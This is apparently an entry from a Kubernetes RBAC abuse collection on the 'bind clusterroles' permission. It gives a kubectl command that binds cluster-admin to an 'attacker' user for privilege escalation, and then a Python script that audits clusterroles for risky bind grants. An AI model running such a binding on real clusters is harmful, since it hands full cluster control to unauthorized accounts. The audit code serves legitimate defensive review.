can-i gtfo?

Kubernetes RBAC Abuse Collection

bind clusterroles

Abuses

Privilege Escalation

Bind privileged cluster roles to controlled accounts for cluster-wide privilege escalation

# Bind cluster-admin to controlled user
kubectl create clusterrolebinding cluster-admin-escalation --clusterrole=cluster-admin --user=attacker
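
To audit for this exposure, the following added example (not part of the can-i gtfo? project) scans the JSON printed by `kubectl get clusterroles -o json` for rules that grant the bind verb on clusterroles, wildcard grants included, and reports whether resourceNames limits which roles can be bound. The role names in the sample and the function names are constructed for illustration.

```python
import json

RBAC_GROUP = "rbac.authorization.k8s.io"

# Constructed sample, shaped like `kubectl get clusterroles -o json` output.
SAMPLE = json.loads("""
{"items": [
  {"metadata": {"name": "rbac-delegator"},
   "rules": [{"apiGroups": ["rbac.authorization.k8s.io"],
              "resources": ["clusterroles"], "verbs": ["bind"]},
             {"apiGroups": ["rbac.authorization.k8s.io"],
              "resources": ["clusterrolebindings"], "verbs": ["create"]}]},
  {"metadata": {"name": "view-binder"},
   "rules": [{"apiGroups": ["rbac.authorization.k8s.io"],
              "resources": ["clusterroles"], "verbs": ["bind"],
              "resourceNames": ["view"]}]},
  {"metadata": {"name": "wildcard-ops"},
   "rules": [{"apiGroups": ["*"], "resources": ["*"], "verbs": ["*"]}]},
  {"metadata": {"name": "pod-reader"},
   "rules": [{"apiGroups": [""], "resources": ["pods"],
              "verbs": ["get", "list"]}]},
  {"metadata": {"name": "metrics"},
   "rules": [{"nonResourceURLs": ["/metrics"], "verbs": ["get"]}]}
]}
""")


def _matches(values, wanted):
    """True if an RBAC rule list names `wanted` or the '*' wildcard."""
    return wanted in values or "*" in values


def find_bind_grants(clusterrole_list):
    """Return (role, bindable names) per rule granting bind on clusterroles."""
    findings = []
    for role in clusterrole_list.get("items", []):
        for rule in role.get("rules") or []:  # aggregated roles may have null rules
            if (_matches(rule.get("apiGroups", []), RBAC_GROUP)
                    and _matches(rule.get("resources", []), "clusterroles")
                    and _matches(rule.get("verbs", []), "bind")):
                # No resourceNames means every ClusterRole, cluster-admin included.
                names = rule.get("resourceNames") or ["*"]
                findings.append((role["metadata"]["name"], sorted(names)))
    return findings


if __name__ == "__main__":
    for name, bindable in find_bind_grants(SAMPLE):
        print(f"{name}: can bind {', '.join(bindable)}")
```

Roles reported with `*` are the ones to review first; follow each back to its bindings to see which subjects hold it.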